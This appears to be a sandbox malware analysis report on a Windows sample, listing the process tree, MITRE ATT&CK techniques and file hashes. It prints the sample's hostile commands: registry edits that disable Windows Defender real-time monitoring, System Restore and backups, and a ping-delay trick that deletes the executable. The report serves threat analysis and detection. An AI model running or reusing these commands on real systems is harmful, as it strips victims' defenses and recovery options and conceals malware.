-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe"2⤵PID:6972
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:9848
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2852
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:3980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:4244
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7132
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7936
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:9120
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:18076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4052 -ip 40521⤵PID:8556
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53539b67f1ccd360fe8ec665303a65bf3
SHA1d2bdc26f4847acfb9c45a1ac21935c58a85dba35
SHA2561162354dcb60b7b09c3e44bec89f834a4e1dfa1cc470a75eeb5aca2b4a4a06dc
SHA5123e7a511e5fb990f5976116e98db690cc0b1e30fddf33743b715ce1e889c662229c5ff3aba647df5800b12b2021f2ed4153ba75fe28856d6f975e0895f51e9d72
-
Filesize
12KB
MD5e223f573457924b21de8c6886c6578fa
SHA116e72697c8a9649c5cd430c36810080a6ac998be
SHA256b0999c303365702e2e36eeee3271b773cc26e7f5faf5e79a1cc3674d9e512dba
SHA51246bb1928f05e6e5537e8f3972481c3e3449d9db515e378a68a1c00ec4632cf1b88350b596808f93203655f2e4dd07951eef3bd27b3ed246120a0dc78aca2ec75
-
Filesize
684B
MD5631234ad4f10f00c837ec282af99af20
SHA1937f091c63855898b09323f1a41ecb646f3ce6b7
SHA256606005dee6d2327ecdba70ce1f1c9566a682ecd7a4ba6c3f3223fe4bf638653b
SHA5128ca3b81e6919cb118f28e0aae276f88298da76bdc9810734e01f1a3ca523b0fa79720fdf087a581e51b72557909f6ac423ec8f557c3141e26a695c1ee0d036dd